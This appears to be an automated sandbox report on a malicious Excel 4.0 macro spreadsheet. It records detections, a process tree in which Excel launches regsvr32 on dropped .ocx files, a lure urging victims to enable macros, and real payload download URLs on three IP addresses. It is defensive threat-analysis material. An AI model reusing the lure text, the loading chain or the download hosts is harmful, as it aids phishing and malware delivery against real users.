Loading ...

Play interactive tourEdit tour

Windows Analysis Report SRLTX-1266305223.xlsb

Overview

General Information

Sample Name:SRLTX-1266305223.xlsb
Analysis ID:532384
MD5:9a33b86fa2ee2372023d418129238b25
SHA1:d94101917d187df6bd710f2abf288cf9f2ee86c9
SHA256:141a23ce14ba6702fdba9d074fe66eab9f9084be7030033b0258656942a3c660
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
May sleep (evasive loops) to hinder dynamic analysis
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected potential crypto function
Contains functionality for execution timing, often used to detect debuggers

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2244 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1172 cmdline: regsvr32 C:\ProgramData\Volet1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2092 cmdline: regsvr32 C:\ProgramData\Volet2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2300 cmdline: regsvr32 C:\ProgramData\Volet3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2244, ProcessCommandLine: regsvr32 C:\ProgramData\Volet1.ocx, ProcessId: 1172

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: SRLTX-1266305223.xlsbVirustotal: Detection: 14%Perma Link
Source: SRLTX-1266305223.xlsbReversingLabs: Detection: 33%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 80.71.157.224:80
Source: excel.exeMemory has grown: Private usage: 4MB later: 31MB
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 80.71.157.224:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 101.99.95.15:80
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 185.104.195.81:80
Source: unknownTCP traffic detected without corresponding DNS query: 80.71.157.224
Source: unknownTCP traffic detected without corresponding DNS query: 80.71.157.224
Source: unknownTCP traffic detected without corresponding DNS query: 80.71.157.224
Source: unknownTCP traffic detected without corresponding DNS query: 80.71.157.224
Source: unknownTCP traffic detected without corresponding DNS query: 80.71.157.224
Source: unknownTCP traffic detected without corresponding DNS query: 80.71.157.224
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.95.15
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.95.15
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.95.15
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.95.15
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.95.15
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.95.15
Source: unknownTCP traffic detected without corresponding DNS query: 185.104.195.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.104.195.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.104.195.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.104.195.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.104.195.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.104.195.81
Source: EXCEL.EXE, 00000000.00000002.935374287.00000000058E3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.667354007.00000000058EC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.540318968.00000000058EE000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comQ equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.935374287.00000000058E3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.667354007.00000000058EC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.540318968.00000000058EE000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.935283630.0000000005755000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.540300873.000000000590F000.00000004.00000001.sdmpString found in binary or memory: http://101.99.95.15/650918116841.dat
Source: EXCEL.EXE, 00000000.00000003.540300873.000000000590F000.00000004.00000001.sdmpString found in binary or memory: http://101.99.95.15/650918116841.dat0
Source: EXCEL.EXE, 00000000.00000002.935283630.0000000005755000.00000004.00000001.sdmpString found in binary or memory: http://101.99.95.15/650918116841.datu
Source: EXCEL.EXE, 00000000.00000002.935890014.000000000590F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.667337972.000000000590F000.00000004.00000001.sdmpString found in binary or memory: http://185.104.195.81/650918116841.dat
Source: EXCEL.EXE, 00000000.00000002.935890014.000000000590F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.667337972.000000000590F000.00000004.00000001.sdmpString found in binary or memory: http://185.104.195.81/650918116841.datl
Source: EXCEL.EXE, 00000000.00000002.935283630.0000000005755000.00000004.00000001.sdmpString found in binary or memory: http://80.71.157.224/650918116841.dat
Source: EXCEL.EXE, 00000000.00000002.935283630.0000000005755000.00000004.00000001.sdmpString found in binary or memory: http://80.71.157.224/650918116841.dat$
Source: EXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.934880728.0000000005177000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726897219.0000000004B67000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707603613.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.690168731.00000000049F7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.934880728.0000000005177000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726897219.0000000004B67000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707603613.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.690168731.00000000049F7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000005.00000002.726239843.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.706943138.0000000003B30000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689549592.0000000003A30000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.725755552.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.706494735.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.688892478.0000000001C70000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.934880728.0000000005177000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726897219.0000000004B67000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707603613.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.690168731.00000000049F7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.934880728.0000000005177000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726897219.0000000004B67000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707603613.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.690168731.00000000049F7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000005.00000002.726239843.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.706943138.0000000003B30000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689549592.0000000003A30000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.934880728.0000000005177000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726897219.0000000004B67000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707603613.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.690168731.00000000049F7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E5B98A58.jpgJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 ~EcmwARNNG Thisfileoriginate
Source: Screenshot number: 4Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 4Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Screenshot number: 8Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 ~EcmwARNNG Thisfileoriginate
Source: Screenshot number: 8Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 8Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Found malicious Excel 4.0 MacroShow sources
Source: SRLTX-1266305223.xlsbMacro extractor: Sheet: Tiposa contains: urlmon
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: SRLTX-1266305223.xlsbInitial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheetShow sources
Source: SRLTX-1266305223.xlsbInitial sample: Sheet name: Tiposa1
Source: SRLTX-1266305223.xlsbInitial sample: Sheet name: Tiposa
Source: SRLTX-1266305223.xlsbMacro extractor: Sheet name: Tiposa1
Source: SRLTX-1266305223.xlsbMacro extractor: Sheet name: Tiposa
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02F966F30_2_02F966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02F966E80_2_02F966E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02F967530_2_02F96753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02F963400_2_02F96340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02F967430_2_02F96743
Source: SRLTX-1266305223.xlsbVirustotal: Detection: 14%
Source: SRLTX-1266305223.xlsbReversingLabs: Detection: 33%
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocxJump to behavior
Source: EXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SRLTX-1266305223.xlsbJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC725.tmpJump to behavior
Source: classification engineClassification label: mal84.expl.evad.winXLSB@7/5@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: SRLTX-1266305223.xlsbInitial sample: OLE zip file path = xl/media/image1.jpg
Source: SRLTX-1266305223.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 11750000.0.drInitial sample: OLE zip file path = xl/media/image1.jpg
Source: 11750000.0.drInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2056Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 888Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2696Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02F966F3 rdtsc 0_2_02F966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02F966F3 rdtsc 0_2_02F966F3
Source: EXCEL.EXE, 00000000.00000002.933106758.0000000000790000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.933106758.0000000000790000.00000002.00020000.sdmpBinary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.933106758.0000000000790000.00000002.00020000.sdmpBinary or memory string: Program Manager<

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting3Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting3LSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SRLTX-1266305223.xlsb15%VirustotalBrowse
SRLTX-1266305223.xlsb33%ReversingLabsDocument-Excel.Downloader.EncDoc

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://185.104.195.81/650918116841.datl0%Avira URL Cloudsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://101.99.95.15/650918116841.datu0%Avira URL Cloudsafe
http://101.99.95.15/650918116841.dat00%Avira URL Cloudsafe
http://185.104.195.81/650918116841.dat0%Avira URL Cloudsafe
http://80.71.157.224/650918116841.dat0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://101.99.95.15/650918116841.dat0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://80.71.157.224/650918116841.dat$0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.934880728.0000000005177000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726897219.0000000004B67000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707603613.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.690168731.00000000049F7000.00000002.00020000.sdmpfalse
    high
    http://www.windows.com/pctv.regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpfalse
      high
      http://185.104.195.81/650918116841.datlEXCEL.EXE, 00000000.00000002.935890014.000000000590F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.667337972.000000000590F000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://investor.msn.comEXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpfalse
          high
          http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.934880728.0000000005177000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726897219.0000000004B67000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707603613.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.690168731.00000000049F7000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000005.00000002.726239843.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.706943138.0000000003B30000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689549592.0000000003A30000.00000002.00020000.sdmpfalse
            high
            http://101.99.95.15/650918116841.datuEXCEL.EXE, 00000000.00000002.935283630.0000000005755000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://investor.msn.com/EXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpfalse
              high
              http://101.99.95.15/650918116841.dat0EXCEL.EXE, 00000000.00000003.540300873.000000000590F000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://185.104.195.81/650918116841.datEXCEL.EXE, 00000000.00000002.935890014.000000000590F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.667337972.000000000590F000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://80.71.157.224/650918116841.datEXCEL.EXE, 00000000.00000002.935283630.0000000005755000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.%s.comPAregsvr32.exe, 00000005.00000002.726239843.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.706943138.0000000003B30000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689549592.0000000003A30000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://101.99.95.15/650918116841.datEXCEL.EXE, 00000000.00000002.935283630.0000000005755000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.540300873.000000000590F000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.934880728.0000000005177000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726897219.0000000004B67000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707603613.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.690168731.00000000049F7000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.934677009.0000000004F90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.726677892.0000000004980000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.707387043.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.689944169.0000000004810000.00000002.00020000.sdmpfalse
                high
                http://80.71.157.224/650918116841.dat$EXCEL.EXE, 00000000.00000002.935283630.0000000005755000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://servername/isapibackend.dllregsvr32.exe, 00000005.00000002.725755552.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.706494735.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.688892478.0000000001C70000.00000002.00020000.sdmpfalse
                • Avira URL Cloud: safe
                low

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                185.104.195.81
                unknownIran (ISLAMIC Republic Of)
                202391AFRARASAIRfalse
                101.99.95.15
                unknownMalaysia
                45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse
                80.71.157.224
                unknownunknown
                197301PARKNET-ASDKfalse

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:532384
                Start date:02.12.2021
                Start time:07:37:14
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 43s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:SRLTX-1266305223.xlsb
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal84.expl.evad.winXLSB@7/5@0/3
                EGA Information:Failed
